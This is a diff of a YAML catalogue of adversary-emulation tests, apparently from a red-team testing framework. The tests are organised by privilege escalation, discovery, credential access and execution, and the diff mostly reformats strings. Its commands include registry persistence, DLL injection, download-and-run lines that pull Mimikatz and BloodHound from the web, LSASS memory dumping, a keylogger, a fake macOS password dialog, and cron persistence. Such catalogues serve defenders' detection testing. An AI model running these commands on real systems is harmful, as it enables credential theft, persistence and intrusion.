File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
- name: IFEO GLobal Flags
description: |
Leverage Global Flags Settings
description: 'Leverage Global Flags Settings
'
supported_platforms:
- windows
input_arguments:
@@ -8315,8 +8649,14 @@ privilege-escalation:
default: cmd.exe
executor:
name: command_prompt
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}"
/v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess
/d "#{payload_binary}"
'
T1160:
technique:
name: Launch Daemon
@@ -8385,8 +8725,9 @@ privilege-escalation:
identifier: T1160
atomic_tests:
- name: Launch Daemon
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
@@ -8479,8 +8820,9 @@ privilege-escalation:
identifier: T1050
atomic_tests:
- name: Service Installation
description: |
Installs A Local Service
description: 'Installs A Local Service
'
supported_platforms:
- windows
input_arguments:
@@ -8500,8 +8842,9 @@ privilege-escalation:
sc.exe stop #{service_name}
sc.exe delete #{service_name}
- name: Service Installation PowerShell Installs A Local Service using PowerShell
description: |
Installs A Local Service via PowerShell
description: 'Installs A Local Service via PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -8583,8 +8926,9 @@ privilege-escalation:
identifier: T1150
atomic_tests:
- name: Plist Modification
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
@@ -8753,8 +9097,9 @@ privilege-escalation:
identifier: T1055
atomic_tests:
- name: Process Injection via mavinject.exe
description: |
Windows 10 Utility To Inject DLLS
description: 'Windows 10 Utility To Inject DLLS
'
supported_platforms:
- windows
input_arguments:
@@ -8768,11 +9113,13 @@ privilege-escalation:
default: "$pid"
executor:
name: powershell
command: |
mavinject $pid /INJECTRUNNING #{dll_payload}
command: 'mavinject $pid /INJECTRUNNING #{dll_payload}
'
- name: Process Injection via PowerSploit
description: |
PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
'
supported_platforms:
- windows
input_arguments:
@@ -8786,8 +9133,9 @@ privilege-escalation:
default: "$pid"
executor:
name: powershell
command: |
Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
command: 'Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
'
T1053:
technique:
name: Scheduled Task
@@ -8887,8 +9235,9 @@ privilege-escalation:
- windows
executor:
name: command_prompt
command: |
at 13:20 /interactive cmd
command: 'at 13:20 /interactive cmd
'
- name: Scheduled task Local
description: ''
supported_platforms:
@@ -8904,11 +9253,13 @@ privilege-escalation:
default: 72600
executor:
name: command_prompt
command: |
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
- name: Scheduled task Remote
description: |
Create a task on a remote system
description: 'Create a task on a remote system
'
supported_platforms:
- windows
input_arguments:
@@ -8934,8 +9285,10 @@ privilege-escalation:
default: At0micStrong
executor:
name: command_prompt
command: |
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
T1166:
technique:
name: Setuid and Setgid
@@ -8982,8 +9335,9 @@ privilege-escalation:
identifier: T1166
atomic_tests:
- name: Setuid and Setgid
description: |
Setuid and Setgid
description: 'Setuid and Setgid
'
supported_platforms:
- macos
- centos
@@ -9071,11 +9425,14 @@ privilege-escalation:
- macos
executor:
name: manual
steps: |
1. /Library/StartupItems/StartupParameters.plist
steps: '1. /Library/StartupItems/StartupParameters.plist
'
- name: Startup Items (emond rule)
description: |
Establish persistence via a rule run by emond daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
description: 'Establish persistence via a rule run by emond daemon at startup,
based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
'
supported_platforms:
- macos
input_arguments:
@@ -9138,8 +9495,9 @@ privilege-escalation:
identifier: T1169
atomic_tests:
- name: Sudo usage
description: |
Common Sudo enumeration methods.
description: 'Common Sudo enumeration methods.
'
supported_platforms:
- macos
- linux
@@ -9216,8 +9574,11 @@ privilege-escalation:
identifier: T1206
atomic_tests:
- name: Unlimited sudo cache timeout
description: |
Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
'
supported_platforms:
- macos
- linux
@@ -9227,8 +9588,10 @@ privilege-escalation:
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
- name: Disable tty_tickets for sudo caching
description: |
Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
'
supported_platforms:
- macos
- linux
@@ -9297,8 +9660,9 @@ discovery:
identifier: T1087
atomic_tests:
- name: List all accounts
description: |
xxx
description: 'xxx
'
supported_platforms:
- linux
- macos
@@ -9309,11 +9673,13 @@ discovery:
default: "~/loot.txt"
executor:
name: sh
command: |
cat /etc/passwd > #{output_file}
command: 'cat /etc/passwd > #{output_file}
'
- name: View sudoers access
description: |
xxx (requires root)
description: 'xxx (requires root)
'
supported_platforms:
- linux
- macos
@@ -9324,11 +9690,13 @@ discovery:
default: "~/loot.txt"
executor:
name: sh
command: |
cat /etc/sudoers > #{output_file}
command: 'cat /etc/sudoers > #{output_file}
'
- name: View accounts with UID 0
description: |
xxx
description: 'xxx
'
supported_platforms:
- linux
- macos
@@ -9339,21 +9707,25 @@ discovery:
default: "~/loot.txt"
executor:
name: sh
command: |
grep 'x:0:' /etc/passwd > #{output_file}
command: 'grep ''x:0:'' /etc/passwd > #{output_file}
'
- name: List opened files by user
description: |
xxx
description: 'xxx
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
command: 'username=$(echo $HOME | awk -F''/'' ''{print $3}'') && lsof -u $username
'
- name: Show if a user account has ever logger in remotely
description: |
xxx
description: 'xxx
'
supported_platforms:
- linux
- macos
@@ -9364,11 +9736,13 @@ discovery:
default: "~/loot.txt"
executor:
name: sh
command: |
lastlog > #{output_file}
command: 'lastlog > #{output_file}
'
- name: Enumerate Groups and users
description: |
utilize local utilities to identify users and groups
description: 'utilize local utilities to identify users and groups
'
supported_platforms:
- linux
- macos
@@ -9383,8 +9757,9 @@ discovery:
dscacheutil -q group
dscacheutil -q user
- name: Enumerate all user accounts
description: |
List all accounts
description: 'List all accounts
'
supported_platforms:
- windows
executor:
@@ -9397,8 +9772,9 @@ discovery:
net localgroup "Users"
net localgroup
- name: Enumerate all user accounts - PowerShell
description: |
List all accounts with PowerShell
description: 'List all accounts with PowerShell
'
supported_platforms:
- windows
executor:
@@ -9416,23 +9792,27 @@ discovery:
get-localgroup
net localgroup
- name: Get logged on Users
description: |
List logged on users
description: 'List logged on users
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
query user
command: 'query user
'
- name: Get logged on users PowerShell
description: |
List logged on users powershell
description: 'List logged on users powershell
'
supported_platforms:
- windows
executor:
name: powershell
command: |
query user
command: 'query user
'
'':
technique:
name: Peripheral Device Discovery
@@ -9518,23 +9898,31 @@ discovery:
identifier: T1217
atomic_tests:
- name: List Mozilla Firefox Bookmark Database Files on Linux
description: |
Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file.
description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions)
that contains bookmarks and lists any found instances to a text file.
'
supported_platforms:
- linux
executor:
name: sh
command: |
find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
command: 'find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >>
/tmp/firefox-bookmarks.txt \;
'
- name: List Mozilla Firefox Bookmark Database Files on macOS
description: |
Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file.
description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS)
that contains bookmarks and lists any found instances to a text file.
'
supported_platforms:
- macos
executor:
name: sh
command: |
find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
command: 'find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {}
>> /tmp/firefox-bookmarks.txt \;
'
T1083:
technique:
name: File and Directory Discovery
@@ -9595,8 +9983,9 @@ discovery:
identifier: T1083
atomic_tests:
- name: File and Directory Discovery
description: |
Find or discover files on the file system
description: 'Find or discover files on the file system
'
supported_platforms:
- windows
executor:
@@ -9611,8 +10000,9 @@ discovery:
dir "%userprofile%\Desktop\*.*" >> %temp%\download
tree /F >> %temp%\download
- name: File and Directory Discovery
description: |
Find or discover files on the file system
description: 'Find or discover files on the file system
'
supported_platforms:
- windows
executor:
@@ -9644,8 +10034,9 @@ discovery:
locate *
which sh
- name: Nix File and Directory Discovery
description: |
Find or discover files on the file system
description: 'Find or discover files on the file system
'
supported_platforms:
- macos
- linux
@@ -9702,8 +10093,9 @@ discovery:
identifier: T1046
atomic_tests:
- name: Port Scan
description: |
Scan ports to check for listening ports
description: 'Scan ports to check for listening ports
'
supported_platforms:
- linux
- macos
@@ -9715,8 +10107,9 @@ discovery:
echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
done
- name: Port Scan Nmap
description: |
Scan ports to check for listening ports with Nmap.
description: 'Scan ports to check for listening ports with Nmap.
'
supported_platforms:
- linux
- macos
@@ -9801,8 +10194,9 @@ discovery:
identifier: T1135
atomic_tests:
- name: Network Share Discovery
description: |
Network Share Discovery
description: 'Network Share Discovery
'
supported_platforms:
- macos
- linux
@@ -9818,8 +10212,9 @@ discovery:
smbutil view -g //#{computer_name}
showmount #{computer_name}
- name: Network Share Discovery command prompt
description: |
Network Share Discovery utilizing the command prompt
description: 'Network Share Discovery utilizing the command prompt
'
supported_platforms:
- windows
input_arguments:
@@ -9829,11 +10224,13 @@ discovery:
default: computer1
executor:
name: command_prompt
command: |
net view \\#{computer_name}
command: 'net view \\#{computer_name}
'
- name: Network Share Discovery PowerShell
description: |
Network Share Discovery utilizing PowerShell
description: 'Network Share Discovery utilizing PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -9910,26 +10307,33 @@ discovery:
identifier: T1201
atomic_tests:
- name: Examine password complexity policy - Ubuntu
description: |
Lists the password complexity policy to console on Ubuntu Linux.
description: 'Lists the password complexity policy to console on Ubuntu Linux.
'
supported_platforms:
- ubuntu
executor:
name: bash
command: |
cat /etc/pam.d/common-password
command: 'cat /etc/pam.d/common-password
'
- name: Examine password complexity policy - CentOS/RHEL 7.x
description: |
Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.
description: 'Lists the password complexity policy to console on CentOS/RHEL
7.x Linux.
'
supported_platforms:
- centos
executor:
name: bash
command: |
cat /etc/security/pwquality.conf
command: 'cat /etc/security/pwquality.conf
'
- name: Examine password complexity policy - CentOS/RHEL 6.x
description: |
Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.
description: 'Lists the password complexity policy to console on CentOS/RHEL
6.x Linux.
'
supported_platforms:
- centos
executor:
@@ -9939,14 +10343,16 @@ discovery:
cat /etc/security/pwquality.conf
- name: Examine password expiration policy - All Linux
description: |
Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
'
supported_platforms:
- linux
executor:
name: bash
command: |
cat /etc/login.defs
command: 'cat /etc/login.defs
'
T1069:
technique:
name: Permission Groups Discovery
@@ -9996,8 +10402,9 @@ discovery:
identifier: T1069
atomic_tests:
- name: Permission Groups Discovery
description: |
Permission Groups Discovery
description: 'Permission Groups Discovery
'
supported_platforms:
- macos
- linux
@@ -10008,8 +10415,9 @@ discovery:
dscl . -list /Groups
groups
- name: Permission Groups Discovery Windows
description: |
Permission Groups Discovery for Windows
description: 'Permission Groups Discovery for Windows
'
supported_platforms:
- windows
executor:
@@ -10018,8 +10426,9 @@ discovery:
net localgroup
net group /domain
- name: Permission Groups Discovery PowerShell
description: |
Permission Groups Discovery utilizing PowerShell
description: 'Permission Groups Discovery utilizing PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -10087,8 +10496,9 @@ discovery:
identifier: T1057
atomic_tests:
- name: Process Discovery - ps
description: |
Utilize ps to identify processes
description: 'Utilize ps to identify processes
'
supported_platforms:
- macos
- centos
@@ -10249,8 +10659,9 @@ discovery:
identifier: T1018
atomic_tests:
- name: Remote System Discovery - net
description: |
Identify remote systems with net.exe
description: 'Identify remote systems with net.exe
'
supported_platforms:
- windows
executor:
@@ -10259,43 +10670,52 @@ discovery:
net view /domain
net view
- name: Remote System Discover - ping sweep
description: |
Identify remote systems via ping sweep
description: 'Identify remote systems via ping sweep
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
'
- name: Remote System Discover - arp
description: |
Identify remote systems via arp
description: 'Identify remote systems via arp
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
arp -a
command: 'arp -a
'
- name: Remote System Discovery - arp nix
description: |
Identify remote systems via arp
description: 'Identify remote systems via arp
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
arp -a | grep -v '^?'
command: 'arp -a | grep -v ''^?''
'
- name: Remote System Discovery - sweep
description: |
Identify remote systems via ping sweep
description: 'Identify remote systems via ping sweep
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
command: 'for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq
0 ] && echo "192.168.1.$ip UP" || : ; done
'
T1063:
technique:
name: Security Software Discovery
@@ -10347,8 +10767,9 @@ discovery:
identifier: T1063
atomic_tests:
- name: Security Software Discovery
description: |
Methods to identify Security Software on an endpoint
description: 'Methods to identify Security Software on an endpoint
'
supported_platforms:
- windows
executor:
@@ -10361,8 +10782,9 @@ discovery:
tasklist.exe | findstr /i defender
tasklist.exe | findstr /i cylance
- name: Security Software Discovery - powershell
description: |
Methods to identify Security Software on an endpoint
description: 'Methods to identify Security Software on an endpoint
'
supported_platforms:
- windows
executor:
@@ -10373,8 +10795,9 @@ discovery:
get-process | ?{$_.Description -like "*defender*"}
get-process | ?{$_.Description -like "*cylance*"}
- name: Security Software Discovery - ps
description: |
Methods to identify Security Software on an endpoint
description: 'Methods to identify Security Software on an endpoint
'
supported_platforms:
- linux
- macos
@@ -10384,8 +10807,10 @@ discovery:
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
- name: Security Software Discovery - Sysmon Service
description: |
Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
description: 'Discovery of an installed Sysinternals Sysmon service using driver
altitude (even if the name is changed).
'
supported_platforms:
- windows
executor:
@@ -10440,8 +10865,9 @@ discovery:
identifier: T1082
atomic_tests:
- name: System Information Discovery
description: |
Identify System Info
description: 'Identify System Info
'
supported_platforms:
- windows
executor:
@@ -10450,8 +10876,9 @@ discovery:
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
- name: System Information Discovery
description: |
Identify System Info
description: 'Identify System Info
'
supported_platforms:
- linux
- macos
@@ -10462,8 +10889,9 @@ discovery:
system_profiler
ls -al /Applications
- name: List OS Information
description: |
Identify System Info
description: 'Identify System Info
'
supported_platforms:
- linux
- macos
@@ -10515,8 +10943,9 @@ discovery:
identifier: T1016
atomic_tests:
- name: System Network Configuration Discovery
description: |
Identify network configuration information
description: 'Identify network configuration information
'
supported_platforms:
- windows
executor:
@@ -10528,8 +10957,9 @@ discovery:
nbtstat -n
net config
- name: System Network Configuration Discovery
description: |
Identify network configuration information
description: 'Identify network configuration information
'
supported_platforms:
- macos
- linux
@@ -10588,8 +11018,9 @@ discovery:
identifier: T1049
atomic_tests:
- name: System Network Connections Discovery
description: |
Get a listing of network connections.
description: 'Get a listing of network connections.
'
supported_platforms:
- windows
executor:
@@ -10599,17 +11030,20 @@ discovery:
net use
net sessions
- name: System Network Connections Discovery with PowerShell
description: |
Get a listing of network connections.
description: 'Get a listing of network connections.
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-NetTCPConnection
command: 'Get-NetTCPConnection
'
- name: System Network Connections Discovery Linux & MacOS
description: |
Get a listing of network connections.
description: 'Get a listing of network connections.
'
supported_platforms:
- linux
- macos
@@ -10671,8 +11105,9 @@ discovery:
identifier: T1033
atomic_tests:
- name: System Owner/User Discovery
description: |
Identify System owner or users on an endpoint
description: 'Identify System owner or users on an endpoint
'
supported_platforms:
- windows
input_arguments:
@@ -10692,8 +11127,9 @@ discovery:
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
- name: System Owner/User Discovery
description: |
Identify System owner or users on an endpoint
description: 'Identify System owner or users on an endpoint
'
supported_platforms:
- linux
- macos
@@ -10744,8 +11180,9 @@ discovery:
identifier: T1007
atomic_tests:
- name: System Service Discovery
description: |
Identify system services
description: 'Identify system services
'
supported_platforms:
- windows
input_arguments:
@@ -10813,8 +11250,9 @@ discovery:
identifier: T1124
atomic_tests:
- name: System Time Discovery
description: |
Identify the system time
description: 'Identify the system time
'
supported_platforms:
- windows
input_arguments:
@@ -10828,14 +11266,16 @@ discovery:
net time \\#{computer_name}
w32tm /tz
- name: System Time Discovery - PowerShell
description: |
Identify the system time via PowerShell
description: 'Identify the system time via PowerShell
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-Date
command: 'Get-Date
'
credential-access:
T1098:
technique:
@@ -10890,8 +11330,9 @@ credential-access:
identifier: T1098
atomic_tests:
- name: Admin Account Manipulate
description: |
Manipulate Admin Account Name
description: 'Manipulate Admin Account Name
'
supported_platforms:
- windows
executor:
@@ -10956,8 +11397,9 @@ credential-access:
identifier: T1139
atomic_tests:
- name: xxxx
description: |
xxxx
description: 'xxxx
'
supported_platforms:
- linux
- macos
@@ -10977,8 +11419,10 @@ credential-access:
default: "~/loot.txt"
executor:
name: sh
command: |
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} >
#{output_file}
'
T1110:
technique:
name: Brute Force
@@ -11047,8 +11491,10 @@ credential-access:
identifier: T1110
atomic_tests:
- name: Brute Force Credentials
description: |
Creates username and password files then attempts to brute force on remote host
description: 'Creates username and password files then attempts to brute force
on remote host
'
supported_platforms:
- windows
input_arguments:
@@ -11309,8 +11755,10 @@ credential-access:
identifier: T1003
atomic_tests:
- name: Powershell Mimikatz
description: |
Dumps Credentials via Powershell by invoking a remote mimikatz script
description: 'Dumps Credentials via Powershell by invoking a remote mimikatz
script
'
supported_platforms:
- windows
input_arguments:
@@ -11320,20 +11768,25 @@ credential-access:
default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
executor:
name: powershell
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
Invoke-Mimikatz -DumpCreds
'
- name: Gsecdump
description: |
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
description: 'https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
gsecdump -a
command: 'gsecdump -a
'
- name: Windows Credential Editor
description: |
http://www.ampliasecurity.com/research/windows-credentials-editor/
description: 'http://www.ampliasecurity.com/research/windows-credentials-editor/
'
supported_platforms:
- windows
input_arguments:
@@ -11343,8 +11796,9 @@ credential-access:
default: output.txt
executor:
name: command_prompt
command: |
wce -o #{output_file}
command: 'wce -o #{output_file}
'
- name: Registry dump of SAM, creds, and secrets
description: |
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
@@ -11370,8 +11824,9 @@ credential-access:
default: lsass_dump.dmp
executor:
name: command_prompt
command: |
procdump.exe -accepteula -ma lsass.exe #{output_file}
command: 'procdump.exe -accepteula -ma lsass.exe #{output_file}
'
- name: Dump LSASS.exe Memory using Windows Task Manager
description: "The memory of lsass.exe is often dumped for offline credential
theft attacks. This can be achieved with the Windows Task \nManager and administrative
@@ -11481,17 +11936,18 @@ credential-access:
identifier: T1081
atomic_tests:
- name: Browser and System credentials
description: |
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
description: "[LaZagne Source](https://github.com/AlessandroZ/LaZagne)\n"
supported_platforms:
- macos
executor:
name: sh
command: |
python2 laZagne.py all
command: 'python2 laZagne.py all
'
- name: Extract credentials from files
description: |
Extracting credentials from files
description: 'Extracting credentials from files
'
input_arguments:
file_path:
description: Path to search
@@ -11502,11 +11958,14 @@ credential-access:
- linux
executor:
name: sh
command: |
grep -riP password #{file_path}
command: 'grep -riP password #{file_path}
'
- name: Mimikatz & Kittenz
description: |
Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module.
description: 'Mimikatz/kittenz - This will require a Mimikatz executable or
invoke-mimikittenz ps module.
'
supported_platforms:
- windows
executor:
@@ -11515,8 +11974,9 @@ credential-access:
invoke-mimikittenz
mimikatz.exe
- name: Extracting credentials from files
description: |
Extracting Credentials from Files
description: 'Extracting Credentials from Files
'
supported_platforms:
- windows
executor:
@@ -11581,8 +12041,9 @@ credential-access:
identifier: T1214
atomic_tests:
- name: Enumeration for Credentials in Registry
description: |
Queries to enumerate for credentials in the Registry.
description: 'Queries to enumerate for credentials in the Registry.
'
supported_platforms:
- windows
executor:
@@ -11773,8 +12234,9 @@ credential-access:
identifier: T1179
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
description: |
Hooks functions in PowerShell to read TLS Communications
description: 'Hooks functions in PowerShell to read TLS Communications
'
supported_platforms:
- windows
input_arguments:
@@ -11871,8 +12333,7 @@ credential-access:
default: c:\key.log
executor:
name: powershell
command: |
.\Get-Keystrokes.ps1 -LogPath #{filepath}
command: ".\\Get-Keystrokes.ps1 -LogPath #{filepath}\n"
T1141:
technique:
name: Input Prompt
@@ -11930,8 +12391,13 @@ credential-access:
- macos
executor:
name: sh
command: |
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
command: 'osascript -e ''tell app "System Preferences" to activate'' -e ''tell
app "System Preferences" to activate'' -e ''tell app "System Preferences"
to display dialog "Software Update requires that you type your password
to apply changes." & return & return default answer "" with icon 1 with
hidden answer with title "Software Update"''
'
T1142:
technique:
name: Keychain
@@ -12045,8 +12511,10 @@ credential-access:
identifier: T1040
atomic_tests:
- name: Packet Capture Linux
description: |
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
description: 'Perform a PCAP. Wireshark will be required for tshark. TCPdump
may already be installed.
'
supported_platforms:
- linux
input_arguments:
@@ -12060,8 +12528,10 @@ credential-access:
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
- name: Packet Capture MacOS
description: |
Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
description: 'Perform a PCAP on MacOS. This will require Wireshark/tshark to
be installed. TCPdump may already be installed.
'
supported_platforms:
- macos
input_arguments:
@@ -12244,8 +12714,10 @@ execution:
- macos
executor:
name: sh
command: |
osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\" | python &""
command: 'osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''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''));\"
| python &""
'
T1191:
technique:
name: CMSTP
@@ -12321,8 +12793,10 @@ execution:
identifier: T1191
atomic_tests:
- name: CMSTP Executing Remote Scriptlet
description: |
Adversaries may supply CMSTP.exe with INF files infected with malicious commands
description: 'Adversaries may supply CMSTP.exe with INF files infected with
malicious commands
'
supported_platforms:
- windows
input_arguments:
@@ -12332,11 +12806,14 @@ execution:
default: T1191.inf
executor:
name: command_prompt
command: |
cmstp.exe /s #{inf_file_path}
command: 'cmstp.exe /s #{inf_file_path}
'
- name: CMSTP Executing UAC Bypass
description: |
Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
embedding them in the RunPreSetupCommandsSection of an INF file
'
supported_platforms:
- windows
input_arguments:
@@ -12346,8 +12823,9 @@ execution:
default: T1191_uacbypass.inf
executor:
name: command_prompt
command: |
cmstp.exe /s #{inf_file_uac} /au
command: 'cmstp.exe /s #{inf_file_uac} /au
'
T1059:
technique:
name: Command-Line Interface
@@ -12536,8 +13014,9 @@ execution:
identifier: T1173
atomic_tests:
- name: Execute Commands
description: |
Executes commands via DDE using Microsfot Word
description: 'Executes commands via DDE using Microsfot Word
'
supported_platforms:
- windows
executor:
@@ -12615,8 +13094,9 @@ execution:
identifier: T1118
atomic_tests:
- name: InstallUtil uninstall method call
description: |
Executes the Uninstall Method
description: 'Executes the Uninstall Method
'
supported_platforms:
- windows
input_arguments:
@@ -12690,14 +13170,16 @@ execution:
identifier: T1152
atomic_tests:
- name: Launchctl
description: |
Utilize launchctl
description: 'Utilize launchctl
'
supported_platforms:
- macos
executor:
name: sh
command: |
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
'
T1168:
technique:
name: Local Job Scheduling
@@ -12785,8 +13267,9 @@ execution:
identifier: T1168
atomic_tests:
- name: Cron Job
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
- centos
@@ -12799,11 +13282,13 @@ execution:
default: "/tmp/evil.sh"
executor:
name: sh
command: |
echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
command: 'echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
'
- name: Cron Job
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
- centos
@@ -12942,8 +13427,9 @@ execution:
identifier: T1170
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
description: |
Test execution of a remote script using mshta.exe
description: 'Test execution of a remote script using mshta.exe
'
supported_platforms:
- windows
input_arguments:
@@ -12953,8 +13439,9 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct
executor:
name: command_prompt
command: |
mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
'
T1086:
technique:
name: PowerShell
@@ -13035,8 +13522,9 @@ execution:
identifier: T1086
atomic_tests:
- name: Mimikatz
description: |
Download Mimikatz and dump credentials
description: 'Download Mimikatz and dump credentials
'
supported_platforms:
- windows
input_arguments:
@@ -13046,11 +13534,14 @@ execution:
default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
executor:
name: command_prompt
command: |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}'');
Invoke-Mimikatz -DumpCreds"
'
- name: BloodHound
description: |
Download Bloodhound and run it
description: 'Download Bloodhound and run it
'
supported_platforms:
- windows
input_arguments:
@@ -13060,8 +13551,10 @@ execution:
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1
executor:
name: command_prompt
command: |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Get-BloodHoundData"
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
Get-BloodHoundData"
'
- name: Obfuscation Tests
description: |
Different obfuscated methods to test
